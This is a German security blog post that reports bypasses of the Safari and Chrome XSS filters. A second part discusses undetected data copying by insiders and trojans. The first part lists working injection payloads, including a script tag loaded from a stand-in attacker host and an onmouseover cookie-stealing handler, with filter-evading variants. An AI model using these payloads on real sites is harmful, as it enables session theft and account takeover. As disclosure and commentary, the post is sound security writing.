In dem Report meiner Checks schreibe ich dem Kunden immer dazu mit welchem Browser mein XSS-Exploit auszunutzen ist, damit er es nachvollziehen kann — es gibt nämlich nichts schlimmeres als einen Exploit der beim Programmierer nicht funktioniert, weil er den “falschen” Browser benutzt.

In den letzten Wochen musste ich aus der Liste der anfälligen Browser auch den Chrome entfernen, womit nur noch Firefox und Opera von mir als Testbrowser gemeldet wurden. Der Safari ist schon länger aus meiner Liste rausgeflogen, da ein XSS-Schutz dort seit langer Zeit implementiert ist. Injiziertes HTML kann man auch im Safari und Chrome rendern lassen, JavaScript hingegen nicht.

Ich bin ja eher skeptisch wenn ein Filter das eine blockiert und das anderer durchlässt, weshalb ich selber etwas Browser-Forschung betrieben habe, da der Chrome, im Gegensatz zum Safari, eine weite Verbreitung gefunden hat.


Erst letzte Woche wies ich in einem Kommentar darauf hin, dass auch der Safari einen Schutz gegen Cross-Site Scripting enthält, was auch zur Ergänzung des Artikels führte:
“Facebook: IE9 als einziger gegen XSS Angriffe gerüstet” (blogs.technet.com)

Und nun.. Sorry! Meine Forschung war erfolgreich, bzw. aus Sicht von Google und Apple eher unerfreulich. Nun muss der Artikel schon wieder geändert werden und der Internet Explorer ist noch immer ungeschlagen — was den Schutz gegen Cross-Site Scripting angeht. :O)


Injiziert man

• <script src=http://hack.er/s></script>
  oder wenn spitze Klammern nicht zulässig sind
• " onmouseover=alert(document.cookie) "

dann wird dies im Safari und im Chrome nicht ausgeführt.

Werden die Injektionen wie folgt abgeändert, wird der Filter von Safari und Chrome umgangen und der Schadcode wird ausgeführt:

• <script src=http://hack.er/s//&lt;</script>
• " onmouseover=alert(document.cookie)//"

Wieder ein Beispiel für: Blacklisting ist unsicher!

Der Internet Explorer ist wirklich recht sicher was XSS angeht, denn der Filter schmeißt alles raus was injiziert wird. Ob der IE auch mal etwas fälschlich als einen Angriff wertet, kann ich nicht sagen, da es für OS-X keinen Browser von Microsoft gibt und ich Windows nur für bestimmte Tests heranziehe, um zu sehen ob meine Funde auch unter anderen Betriebssystemen funktionieren.


Update: 28.05.2011 – 18:36 Uhr

Eine Leerzeile im Quellcode kann darüber entscheiden ob sich eine XSS-Lücke auftut oder nicht.

Wann wird von “Datendiebstahl” gesprochen? Immer dann, wenn Daten irgendwo auftauchen, wo sie eigentlich nicht zu finden sein sollten oder wenn diese Daten missbraucht werden. Manchmal, so wie bei SONY, auch weil ein Unternehmen den unberechtigten Zugriff auf Daten bemerkt hat und diesen öffentlich macht.

• Wird in der analogen Welt etwas gestohlen, dann hat jemand anderer den Gegenstand und der legitime Besitzer bemerkt den Verlust.
• Wird in der digitalen Welt etwas “gestohlen”, dann hat auch jemand anderer die Daten und der legitime Besitzer verliert nichts, bemerkt also gar nicht, dass von ihm Daten gestohlen kopiert wurden.

Wir sind es aus der analogen Welt gewöhnt das ein Diebstahl mit dem Verlust einer Sache verbunden ist, den wir früher oder später bemerken, daher gehen wir von einem “Datendiebstahl” auch nur dann aus, wenn wir dies bemerken. Nur weil Facebook keinen Hinweis auf einen Datenmissbrauch feststellen konnte, gehen sie davon aus, dass die Daten, auf die die Werbekunden seit 2007 Zugriff hatten, nicht missbraucht wurden. Es gibt aber auch durchaus Möglichkeiten Daten zu missbrauchen ohne dass das Opfer überhaupt ahnt Opfer zu sein.

Wenn ich via Trojaner auf dem Computer meines Opfers Zugriff auf seinen E-Mail-Account habe, dann kann ich die Korrespondenz mitlesen und dies ohne aufzufallen. Ist er in der richtigen Position in einem Unternehmen beschäftigt, dann kann mir dieses Mitlesen durchaus nützlich sein. Erledigt er beispielsweise seine Angebotsabgabe an mögliche Kunden per E-Mail, so kann ich ihn leicht unterbieten, um den Zuschlag zu bekommen. So lange ich meine Aktivitäten nicht zu häufig und zu auffällig mache, wird er mich wahrscheinlich nie bemerken.


“Deutsche Unternehmen fürchten Datenattacken – Ernst & Young-Studie zu Datenklau” (ey.com)

Derzeit fühlt sich die Mehrheit der deutschen Unternehmen allerdings vor Attacken gefeit, nur zehn Prozent berichten von Wirtschaftsspionage oder Datenklau-Attacken in den vergangenen drei Jahren.

Zu beachten ist hierbei: “Derzeit fühlt sich…” — eben, es ist nur ein Gefühl, kein Wissen.

In jedem Unternehmen gibt es Mitarbeiter die zum Teil weitreichende Zugriffsberechtigungen benötigen um ihren Job zu erledigen und all diese Mitarbeiter sind potenzielle Datenkopierer.

• Jemand der im Marketing arbeitet der hat natürlich Zugriff auf die Kundendaten, die er aber auch kopieren kann, um sie direkt zu verkaufen.
• Ein Mitarbeiter aus der Buchhaltung hat u.a. auch Zugang zu den Daten, welche Beträge an welche Firmen geflossen sind, die u.U. auch Rückschlüsse auf streng vertrauliche Geschäftsbeziehungen zulassen.
• Ein kleines Licht in der Personalabteilung kann sich evtl. Zugang zu den Bewerbungen oder auch Abwerbungsangeboten verschaffen, um auch diese Informationen in Bares zu verwandeln.

Ich behaupte: Sehr viele Datenkopierer werden gar nicht bekannt, weil es in der digitalen Welt so einfach wie nie zuvor geworden ist, unbemerkt Informationen zu kopieren und unbemerkt an einen anderen Ort zu verschieben, um daraus Kapital zu schlagen.


Wer via Suchmaschine nach Datenbank-Dumps sucht, nach txt-, csv-, xls- oder auch doc-Dateien, wird sehr schnell auf Datenbestände stoßen, die einfach nur aus Dummheit das Licht der Öffentlichkeit erblickt haben. Wer sich nun diese Daten zu eigen macht, der muss kaum mit Verfolgung rechnen, da sein “Angriff” nicht bemerkt wird.


Das was wir in den letzten Wochen über “Datendiebstahl” gelesen haben, war nur die sprichwörtliche Spitze des Eisbergs.

“Datendiebstahl” oder “Datenkopierer” ist nun keine Wortklauberei von mir, sondern der Versuch klar zu machen, dass ein Datenmissbrauch, nur weil er nicht bemerkt wurde, trotzdem stattgefunden haben kann.